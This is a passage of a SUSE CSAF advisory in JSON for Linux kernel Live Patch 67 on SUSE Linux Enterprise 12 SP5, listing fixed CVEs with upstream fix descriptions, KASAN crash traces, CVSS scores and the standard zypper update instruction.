"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1088-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1088-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261088-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1088-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024961.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1250785",
"url": "https://bugzilla.suse.com/1250785"
},
{
"category": "self",
"summary": "SUSE Bug 1254755",
"url": "https://bugzilla.suse.com/1254755"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255595",
"url": "https://bugzilla.suse.com/1255595"
},
{
"category": "self",
"summary": "SUSE Bug 1256217",
"url": "https://bugzilla.suse.com/1256217"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257118",
"url": "https://bugzilla.suse.com/1257118"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50423 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50423/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50697 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50697/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50756 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50756/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53781 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53781/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21738 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21738/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 67 for SUSE Linux Enterprise 12 SP5)",
"tracking": {
"current_release_date": "2026-03-26T17:03:58Z",
"generator": {
"date": "2026-03-26T17:03:58Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1088-1",
"initial_release_date": "2026-03-26T17:03:58Z",
"revision_history": [
{
"date": "2026-03-26T17:03:58Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"product": {
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"product_id": "kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"product": {
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"product_id": "kgraft-patch-4_12_14-122_255-default-14-2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64",
"product": {
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64",
"product_id": "kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 12 SP5",
"product": {
"name": "SUSE Linux Enterprise Live Patching 12 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 12 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-live-patching:12:sp5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 12 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le"
},
"product_reference": "kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 12 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.s390x as component of SUSE Linux Enterprise Live Patching 12 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x"
},
"product_reference": "kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 12 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 12 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
},
"product_reference": "kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 12 SP5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-50423",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50423"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPICA: Fix use-after-free in acpi_ut_copy_ipackage_to_ipackage()\n\nThere is an use-after-free reported by KASAN:\n\n BUG: KASAN: use-after-free in acpi_ut_remove_reference+0x3b/0x82\n Read of size 1 at addr ffff888112afc460 by task modprobe/2111\n CPU: 0 PID: 2111 Comm: modprobe Not tainted 6.1.0-rc7-dirty\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),\n Call Trace:\n \u003cTASK\u003e\n kasan_report+0xae/0xe0\n acpi_ut_remove_reference+0x3b/0x82\n acpi_ut_copy_iobject_to_iobject+0x3be/0x3d5\n acpi_ds_store_object_to_local+0x15d/0x3a0\n acpi_ex_store+0x78d/0x7fd\n acpi_ex_opcode_1A_1T_1R+0xbe4/0xf9b\n acpi_ps_parse_aml+0x217/0x8d5\n ...\n \u003c/TASK\u003e\n\nThe root cause of the problem is that the acpi_operand_object\nis freed when acpi_ut_walk_package_tree() fails in\nacpi_ut_copy_ipackage_to_ipackage(), lead to repeated release in\nacpi_ut_copy_iobject_to_iobject(). The problem was introduced\nby \"8aa5e56eeb61\" commit, this commit is to fix memory leak in\nacpi_ut_copy_iobject_to_iobject(), repeatedly adding remove\noperation, lead to \"acpi_operand_object\" used after free.\n\nFix it by removing acpi_ut_remove_reference() in\nacpi_ut_copy_ipackage_to_ipackage(). acpi_ut_copy_ipackage_to_ipackage()\nis called to copy an internal package object into another internal\npackage object, when it fails, the memory of acpi_operand_object\nshould be freed by the caller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50423",
"url": "https://www.suse.com/security/cve/CVE-2022-50423"
},
{
"category": "external",
"summary": "SUSE Bug 1250784 for CVE-2022-50423",
"url": "https://bugzilla.suse.com/1250784"
},
{
"category": "external",
"summary": "SUSE Bug 1250785 for CVE-2022-50423",
"url": "https://bugzilla.suse.com/1250785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2022-50423"
},
{
"cve": "CVE-2022-50697",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50697"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmrp: introduce active flags to prevent UAF when applicant uninit\n\nThe caller of del_timer_sync must prevent restarting of the timer, If\nwe have no this synchronization, there is a small probability that the\ncancellation will not be successful.\n\nAnd syzbot report the fellowing crash:\n==================================================================\nBUG: KASAN: use-after-free in hlist_add_head include/linux/list.h:929 [inline]\nBUG: KASAN: use-after-free in enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\nWrite at addr f9ff000024df6058 by task syz-fuzzer/2256\nPointer tag: [f9], memory tag: [fe]\n\nCPU: 1 PID: 2256 Comm: syz-fuzzer Not tainted 6.1.0-rc5-syzkaller-00008-\nge01d50cbd6ee #0\nHardware name: linux,dummy-virt (DT)\nCall trace:\n dump_backtrace.part.0+0xe0/0xf0 arch/arm64/kernel/stacktrace.c:156\n dump_backtrace arch/arm64/kernel/stacktrace.c:162 [inline]\n show_stack+0x18/0x40 arch/arm64/kernel/stacktrace.c:163\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x68/0x84 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:284 [inline]\n print_report+0x1a8/0x4a0 mm/kasan/report.c:395\n kasan_report+0x94/0xb4 mm/kasan/report.c:495\n __do_kernel_fault+0x164/0x1e0 arch/arm64/mm/fault.c:320\n do_bad_area arch/arm64/mm/fault.c:473 [inline]\n do_tag_check_fault+0x78/0x8c arch/arm64/mm/fault.c:749\n do_mem_abort+0x44/0x94 arch/arm64/mm/fault.c:825\n el1_abort+0x40/0x60 arch/arm64/kernel/entry-common.c:367\n el1h_64_sync_handler+0xd8/0xe4 arch/arm64/kernel/entry-common.c:427\n el1h_64_sync+0x64/0x68 arch/arm64/kernel/entry.S:576\n hlist_add_head include/linux/list.h:929 [inline]\n enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\n mod_timer+0x14/0x20 kernel/time/timer.c:1161\n mrp_periodic_timer_arm net/802/mrp.c:614 [inline]\n mrp_periodic_timer+0xa0/0xc0 net/802/mrp.c:627\n call_timer_fn.constprop.0+0x24/0x80 kernel/time/timer.c:1474\n expire_timers+0x98/0xc4 kernel/time/timer.c:1519\n\nTo fix it, we can introduce a new active flags to make sure the timer will\nnot restart.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50697",
"url": "https://www.suse.com/security/cve/CVE-2022-50697"
},
{
"category": "external",
"summary": "SUSE Bug 1255594 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255594"
},
{
"category": "external",
"summary": "SUSE Bug 1255595 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255595"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2022-50697"
},
{
"cve": "CVE-2022-50756",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50756"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-pci: fix mempool alloc size\n\nConvert the max size to bytes to match the units of the divisor that\ncalculates the worst-case number of PRP entries.\n\nThe result is used to determine how many PRP Lists are required. The\ncode was previously rounding this to 1 list, but we can require 2 in the\nworst case. In that scenario, the driver would corrupt memory beyond the\nsize provided by the mempool.\n\nWhile unlikely to occur (you\u0027d need a 4MB in exactly 127 phys segments\non a queue that doesn\u0027t support SGLs), this memory corruption has been\nobserved by kfence.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50756",
"url": "https://www.suse.com/security/cve/CVE-2022-50756"
},
{
"category": "external",
"summary": "SUSE Bug 1256216 for CVE-2022-50756",
"url": "https://bugzilla.suse.com/1256216"
},
{
"category": "external",
"summary": "SUSE Bug 1256217 for CVE-2022-50756",
"url": "https://bugzilla.suse.com/1256217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2022-50756"
},
{
"cve": "CVE-2023-53781",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53781"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc: Fix use-after-free in tcp_write_timer_handler().\n\nWith Eric\u0027s ref tracker, syzbot finally found a repro for\nuse-after-free in tcp_write_timer_handler() by kernel TCP\nsockets. [0]\n\nIf SMC creates a kernel socket in __smc_create(), the kernel\nsocket is supposed to be freed in smc_clcsock_release() by\ncalling sock_release() when we close() the parent SMC socket.\n\nHowever, at the end of smc_clcsock_release(), the kernel\nsocket\u0027s sk_state might not be TCP_CLOSE. This means that\nwe have not called inet_csk_destroy_sock() in __tcp_close()\nand have not stopped the TCP timers.\n\nThe kernel socket\u0027s TCP timers can be fired later, so we\nneed to hold a refcnt for net as we do for MPTCP subflows\nin mptcp_subflow_create_socket().\n\n[0]:\nleaked reference.\n sk_alloc (./include/net/net_namespace.h:335 net/core/sock.c:2108)\n inet_create (net/ipv4/af_inet.c:319 net/ipv4/af_inet.c:244)\n __sock_create (net/socket.c:1546)\n smc_create (net/smc/af_smc.c:3269 net/smc/af_smc.c:3284)\n __sock_create (net/socket.c:1546)\n __sys_socket (net/socket.c:1634 net/socket.c:1618 net/socket.c:1661)\n __x64_sys_socket (net/socket.c:1672)\n do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)\n entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120)\n==================================================================\nBUG: KASAN: slab-use-after-free in tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\nRead of size 1 at addr ffff888052b65e0d by task syzrepro/18091\n\nCPU: 0 PID: 18091 Comm: syzrepro Tainted: G W 6.3.0-rc4-01174-gb5d54eb5899a #7\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.amzn2022.0.1 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl (lib/dump_stack.c:107)\n print_report (mm/kasan/report.c:320 mm/kasan/report.c:430)\n kasan_report (mm/kasan/report.c:538)\n tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\n tcp_write_timer (./include/linux/spinlock.h:390 net/ipv4/tcp_timer.c:643)\n call_timer_fn (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/timer.h:127 kernel/time/timer.c:1701)\n __run_timers.part.0 (kernel/time/timer.c:1752 kernel/time/timer.c:2022)\n run_timer_softirq (kernel/time/timer.c:2037)\n __do_softirq (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/irq.h:142 kernel/softirq.c:572)\n __irq_exit_rcu (kernel/softirq.c:445 kernel/softirq.c:650)\n irq_exit_rcu (kernel/softirq.c:664)\n sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1107 (discriminator 14))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53781",
"url": "https://www.suse.com/security/cve/CVE-2023-53781"
},
{
"category": "external",
"summary": "SUSE Bug 1254751 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254751"
},
{
"category": "external",
"summary": "SUSE Bug 1254755 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254755"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2023-53781"
},
{
"cve": "CVE-2025-21738",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21738"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-sff: Ensure that we cannot write outside the allocated buffer\n\nreveliofuzzing reported that a SCSI_IOCTL_SEND_COMMAND ioctl with out_len\nset to 0xd42, SCSI command set to ATA_16 PASS-THROUGH, ATA command set to\nATA_NOP, and protocol set to ATA_PROT_PIO, can cause ata_pio_sector() to\nwrite outside the allocated buffer, overwriting random memory.\n\nWhile a ATA device is supposed to abort a ATA_NOP command, there does seem\nto be a bug either in libata-sff or QEMU, where either this status is not\nset, or the status is cleared before read by ata_sff_hsm_move().\nAnyway, that is most likely a separate bug.\n\nLooking at __atapi_pio_bytes(), it already has a safety check to ensure\nthat __atapi_pio_bytes() cannot write outside the allocated buffer.\n\nAdd a similar check to ata_pio_sector(), such that also ata_pio_sector()\ncannot write outside the allocated buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21738",
"url": "https://www.suse.com/security/cve/CVE-2025-21738"
},
{
"category": "external",
"summary": "SUSE Bug 1238917 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1238917"
},
{
"category": "external",
"summary": "SUSE Bug 1257118 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1257118"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2025-21738"
},
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n 